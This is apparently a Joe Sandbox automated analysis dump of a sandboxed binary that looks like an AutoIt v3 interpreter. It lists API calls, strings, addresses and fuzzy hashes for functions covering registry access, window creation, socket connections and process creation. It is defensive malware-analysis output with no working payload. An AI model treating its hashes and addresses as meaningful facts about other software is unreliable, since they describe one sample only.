                                                                                                                                                                              • Opcode Fuzzy Hash: babb5f09155c59c772fb0ea21307a9163f0cf18d7f4b620b2b508f102c59d248
                                                                                                                                                                              • Instruction Fuzzy Hash: 4081C272900119AACB04EBE5DC52EEF7BB8EF55318F50001FE541B7092EF686A08DB79

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004CEA39
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 004CEA56
                                                                                                                                                                                • Part of subcall function 004D297D: __wsplitpath_helper.LIBCMT ref: 004D29BD
                                                                                                                                                                              • _wcsncat.LIBCMT ref: 004CEA69
                                                                                                                                                                              • __makepath.LIBCMT ref: 004CEA85
                                                                                                                                                                                • Part of subcall function 004D2BFF: __wmakepath_s.LIBCMT ref: 004D2C13
                                                                                                                                                                                • Part of subcall function 004D010A: std::exception::exception.LIBCMT ref: 004D013E
                                                                                                                                                                                • Part of subcall function 004D010A: __CxxThrowException@8.LIBCMT ref: 004D0153
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 004CEABE
                                                                                                                                                                                • Part of subcall function 004CEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,004CEADA,?,?), ref: 004CEB27
                                                                                                                                                                              • _wcscat.LIBCMT ref: 005232FC
                                                                                                                                                                              • _wcscat.LIBCMT ref: 00523334
                                                                                                                                                                              • _wcsncpy.LIBCMT ref: 00523370
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                                                                              • String ID: Include$\$"W
                                                                                                                                                                              • API String ID: 1213536620-2250962348
                                                                                                                                                                              • Opcode ID: a26aeb773d6a40a093aa616b2353b27054549328c37a6394587c3024ca3b1e64
                                                                                                                                                                              • Instruction ID: 5bab6466ce6671c34c39b5b83ffde48aff3be5f7a130da88f229b09927cb8669
                                                                                                                                                                              • Opcode Fuzzy Hash: a26aeb773d6a40a093aa616b2353b27054549328c37a6394587c3024ca3b1e64
                                                                                                                                                                              • Instruction Fuzzy Hash: 42519EB54043409BC314EF5AFC95C9AB7E8FB69304F40091FF54987261EB789688EF6A

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                              • String ID: 0.0.0.0
                                                                                                                                                                              • API String ID: 208665112-3771769585
                                                                                                                                                                              • Opcode ID: 8b8b671db873745ea933297ff68342302cfd2a5039c84ddee787c793c5436ce2
                                                                                                                                                                              • Instruction ID: d17ccfce657fc13021b02d4c0e554cf9fabb80436972b1ec291234ddca55f07d
                                                                                                                                                                              • Opcode Fuzzy Hash: 8b8b671db873745ea933297ff68342302cfd2a5039c84ddee787c793c5436ce2
                                                                                                                                                                              • Instruction Fuzzy Hash: AD1108B1908119ABDB24AB31AC45FEA777CEB00724F0000ABF50596290EEBCDB858668

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004B2F8B
                                                                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 004B2FB5
                                                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004B2FC6
                                                                                                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 004B2FE3
                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004B2FF3
                                                                                                                                                                              • LoadIconW.USER32(000000A9), ref: 004B3009
                                                                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004B3018
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                              • API String ID: 2914291525-1005189915
                                                                                                                                                                              • Opcode ID: b2b4b155bc7b3677dbe0a0c0e2b0ac8107976e076b1eb7a3dbf501af5b168be3
                                                                                                                                                                              • Instruction ID: 5732ac73bcce4ec07050f3c90708185e54734cc243cb693dfc17334f7716fe69
                                                                                                                                                                              • Opcode Fuzzy Hash: b2b4b155bc7b3677dbe0a0c0e2b0ac8107976e076b1eb7a3dbf501af5b168be3
                                                                                                                                                                              • Instruction Fuzzy Hash: 0121C3B5900718AFDB109FA8F989BCDBBF4FB18704F00411AF615A62A0D7B44588EFA5

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 004B2A33
                                                                                                                                                                              • KillTimer.USER32(?,00000001), ref: 004B2A5D
                                                                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004B2A80
                                                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004B2A8B
                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 004B2A9F
                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 004B2AAE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                              • String ID: TaskbarCreated
                                                                                                                                                                              • API String ID: 129472671-2362178303
                                                                                                                                                                              • Opcode ID: 6024bbb9b360a7ed71a8150d1de8010b228da195e5ac70b8463496b0a16976fe
                                                                                                                                                                              • Instruction ID: 7fc9df72a45f0e624aa9d9168a8ec06a6b876e3cd71d400decc1718435494a3f
                                                                                                                                                                              • Opcode Fuzzy Hash: 6024bbb9b360a7ed71a8150d1de8010b228da195e5ac70b8463496b0a16976fe
                                                                                                                                                                              • Instruction Fuzzy Hash: 90413130200545ABDB34AF6CBE09BFA3669F729340F00451BF515922E1DAAC5C95B77E

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004B30B0
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004B30BF
                                                                                                                                                                              • LoadIconW.USER32(00000063), ref: 004B30D5
                                                                                                                                                                              • LoadIconW.USER32(000000A4), ref: 004B30E7
                                                                                                                                                                              • LoadIconW.USER32(000000A2), ref: 004B30F9
                                                                                                                                                                                • Part of subcall function 004B318A: LoadImageW.USER32(004B0000,00000063,00000001,00000010,00000010,00000000), ref: 004B31AE
                                                                                                                                                                              • RegisterClassExW.USER32(?), ref: 004B3167
                                                                                                                                                                                • Part of subcall function 004B2F58: GetSysColorBrush.USER32(0000000F), ref: 004B2F8B
                                                                                                                                                                                • Part of subcall function 004B2F58: RegisterClassExW.USER32(00000030), ref: 004B2FB5
                                                                                                                                                                                • Part of subcall function 004B2F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004B2FC6
                                                                                                                                                                                • Part of subcall function 004B2F58: InitCommonControlsEx.COMCTL32(?), ref: 004B2FE3
                                                                                                                                                                                • Part of subcall function 004B2F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004B2FF3
                                                                                                                                                                                • Part of subcall function 004B2F58: LoadIconW.USER32(000000A9), ref: 004B3009
                                                                                                                                                                                • Part of subcall function 004B2F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004B3018
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                              • String ID: #$0$AutoIt v3
                                                                                                                                                                              • API String ID: 423443420-4155596026
                                                                                                                                                                              • Opcode ID: efdcddb9cafff84397602e569c8e24441f4623b77279618fdf453eb8700ad1df
                                                                                                                                                                              • Instruction ID: ceff5d561b1f5500a7b4d7e3c97798467ef73b2f795052532df841ffe39be754
                                                                                                                                                                              • Opcode Fuzzy Hash: efdcddb9cafff84397602e569c8e24441f4623b77279618fdf453eb8700ad1df
                                                                                                                                                                              • Instruction Fuzzy Hash: 6C214470D10704ABCB109FADFD09A99BFF5FB54310F10412AE208A62A0D3744588FF69

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0050B777
                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0050B7A4
                                                                                                                                                                              • CoUninitialize.OLE32 ref: 0050B7AE
                                                                                                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 0050B8AE
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 0050B9DB
                                                                                                                                                                              • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0050BA0F
                                                                                                                                                                              • CoGetObject.OLE32(?,00000000,0053D91C,?), ref: 0050BA32
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 0050BA45
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0050BAC5
                                                                                                                                                                              • VariantClear.OLEAUT32(0053D91C), ref: 0050BAD5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2395222682-0
                                                                                                                                                                              • Opcode ID: bc76deb5d23732837ffdef638d82b0d5c43866b1df94dd15e72892a05abbd7da
                                                                                                                                                                              • Instruction ID: e06cb881069376ca385fdc696ae478b3c33a74e76331130f1e15b96e3ecc304b
                                                                                                                                                                              • Opcode Fuzzy Hash: bc76deb5d23732837ffdef638d82b0d5c43866b1df94dd15e72892a05abbd7da
                                                                                                                                                                              • Instruction Fuzzy Hash: ACC10371604305AFD700DF69C884A6ABBF9FF88348F04495DF98A9B291DB71ED05CB62

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • __lock.LIBCMT ref: 004DBA74
                                                                                                                                                                                • Part of subcall function 004D8984: __mtinitlocknum.LIBCMT ref: 004D8996
                                                                                                                                                                                • Part of subcall function 004D8984: EnterCriticalSection.KERNEL32(004D0127,?,004D876D,0000000D), ref: 004D89AF
                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 004DBA85
                                                                                                                                                                                • Part of subcall function 004D7616: __calloc_impl.LIBCMT ref: 004D7625
                                                                                                                                                                                • Part of subcall function 004D7616: Sleep.KERNEL32(00000000,?,004D0127,?,004B125D,00000058,?,?), ref: 004D763C
                                                                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 004DBAA0
                                                                                                                                                                              • GetStartupInfoW.KERNEL32(?,00566990,00000064,004D6B14,005667D8,00000014), ref: 004DBAF9
                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 004DBB44
                                                                                                                                                                              • GetFileType.KERNEL32(00000001), ref: 004DBB8B
                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 004DBBC4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1426640281-0
                                                                                                                                                                              • Opcode ID: 3f0b35f044e2d66b88d642cf096bd1ac7a34a28a628f33d8d0f7fc355d0d6d55
                                                                                                                                                                              • Instruction ID: a44fd74af1349cee43199316589ab66ddf802750579745519281aa80ecb535c0
                                                                                                                                                                              • Opcode Fuzzy Hash: 3f0b35f044e2d66b88d642cf096bd1ac7a34a28a628f33d8d0f7fc355d0d6d55
                                                                                                                                                                              • Instruction Fuzzy Hash: 4A81E170904305CFCB20CF68D8606AABBF0FB19724B24425FD4A6AB3D1C7389843DB99

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 005123E6
                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00512579
                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0051259D
                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005125DD
                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005125FF
                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00512760
                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00512792
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 005127C1
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00512838
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4090791747-0
                                                                                                                                                                              • Opcode ID: 3f6e6680a5e1d0278ae6d8ebfa5ecef5b1f9e47b555666099c90d7d29f109fc9
                                                                                                                                                                              • Instruction ID: 8c318a87831f32e1d325cadeda7246de76d82e9010003c3b1d1d8f93e7715047
                                                                                                                                                                              • Opcode Fuzzy Hash: 3f6e6680a5e1d0278ae6d8ebfa5ecef5b1f9e47b555666099c90d7d29f109fc9
                                                                                                                                                                              • Instruction Fuzzy Hash: 66D1C0316043019FDB14EF25C891BAABBE5BF84314F14845EF8899B3A2DB74DC81CB66

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                              • API String ID: 0-572801152
                                                                                                                                                                              • Opcode ID: 4b815d943e48c9147b39ffbb6ed913891116b79079b69fc8208917a0c0e6d469
                                                                                                                                                                              • Instruction ID: 28548877abbd76286d0968fbf20f673c2c0e1541b65aa61e0ff5104cbc452de9
                                                                                                                                                                              • Opcode Fuzzy Hash: 4b815d943e48c9147b39ffbb6ed913891116b79079b69fc8208917a0c0e6d469
                                                                                                                                                                              • Instruction Fuzzy Hash: A3E1CE71A00219ABDF10DFA8C881BAE7FB5BF49314F14862DF955AB2C1D774AD41CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Variant$ClearInit$_memset
                                                                                                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                              • API String ID: 2862541840-625585964
                                                                                                                                                                              APIs
                                                                                                                                                                              • select.WS2_32(00000000,00000001,00000000,00000000,?,000003E8,0054DBF0), ref: 00509409
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00509416
                                                                                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 0050943A
                                                                                                                                                                              • #16.WSOCK32(?,?,00000000,00000000), ref: 00509452
                                                                                                                                                                              • _strlen.LIBCMT ref: 00509484
                                                                                                                                                                              • _memmove.LIBCMT ref: 005094CA
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 005094F7
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2795762555-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,004CEADA,?,?), ref: 004CEB27
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,004CEADA,?,?), ref: 00524B26
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,004CEADA,?,?), ref: 00524B65
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,004CEADA,?,?), ref: 00524B94
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: QueryValue$CloseOpen
                                                                                                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                                              • API String ID: 1586453840-614718249
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004B2ECB
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004B2EEC
                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004B2F00
                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004B2F09
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CreateShow
                                                                                                                                                                              • String ID: AutoIt v3$edit
                                                                                                                                                                              • API String ID: 1584632944-3779509399
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B3F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004B34E2,?,00000001), ref: 004B3FCD
                                                                                                                                                                              • _free.LIBCMT ref: 00523C27
                                                                                                                                                                              • _free.LIBCMT ref: 00523C6E
                                                                                                                                                                                • Part of subcall function 004BBDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,005722E8,?,00000000,?,004B3E2E,?,00000000,?,0054DBF0,00000000,?), ref: 004BBE8B
                                                                                                                                                                                • Part of subcall function 004BBDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,004B3E2E,?,00000000,?,0054DBF0,00000000,?,00000002), ref: 004BBEA7
                                                                                                                                                                                • Part of subcall function 004BBDF0: __wsplitpath.LIBCMT ref: 004BBF19
                                                                                                                                                                                • Part of subcall function 004BBDF0: _wcscpy.LIBCMT ref: 004BBF31
                                                                                                                                                                                • Part of subcall function 004BBDF0: _wcscat.LIBCMT ref: 004BBF46
                                                                                                                                                                                • Part of subcall function 004BBDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 004BBF56
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<K
                                                                                                                                                                              • API String ID: 1510338132-1946222467
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B3B1E: _wcsncpy.LIBCMT ref: 004B3B32
                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 004F6DBA
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004F6DC5
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 004F6DD9
                                                                                                                                                                              • _wcsrchr.LIBCMT ref: 004F6DFB
                                                                                                                                                                                • Part of subcall function 004F6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 004F6E31
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3633006590-0
                                                                                                                                                                              • Opcode ID: c18449f0d3885fd277f5079afae8991108ee2b706376fa4dec390c5989775143
                                                                                                                                                                              • Instruction ID: 747b08839da49f771d1f47035b043c7f4d8dcd5bee30761be3276dc8c1eca79e
                                                                                                                                                                              • Opcode Fuzzy Hash: c18449f0d3885fd277f5079afae8991108ee2b706376fa4dec390c5989775143
                                                                                                                                                                              • Instruction Fuzzy Hash: 1121D86960531C96DB106775EC5AAFB336CDF11310F21055BE621C32D2EB28CD84966D
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 0050ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0050ACF5
                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00509160
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0050916F
                                                                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 0050918B
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3701255441-0
